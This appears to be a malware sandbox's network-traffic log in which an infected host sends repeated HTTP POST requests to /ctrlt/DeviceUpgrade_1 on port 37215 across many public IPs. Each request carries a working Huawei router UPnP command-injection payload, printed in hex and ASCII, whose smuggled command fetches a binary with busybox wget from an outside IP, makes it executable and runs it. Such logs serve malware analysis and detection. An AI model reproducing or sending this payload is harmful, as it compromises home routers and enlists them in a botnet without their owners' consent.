                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1920192.168.2.1542334197.139.214.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.077347994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1921192.168.2.155866041.248.18.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.077358961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1922192.168.2.155869631.61.207.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.077405930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1923192.168.2.1532858181.197.233.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.078269005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1924192.168.2.153573094.247.226.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.078269005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1925192.168.2.1558696190.128.98.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.078274012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1926192.168.2.1552638181.211.25.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.078424931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1927192.168.2.1542672138.113.94.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.078429937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1928192.168.2.1557048181.59.156.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079365969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1929192.168.2.1534886157.249.88.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079375982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
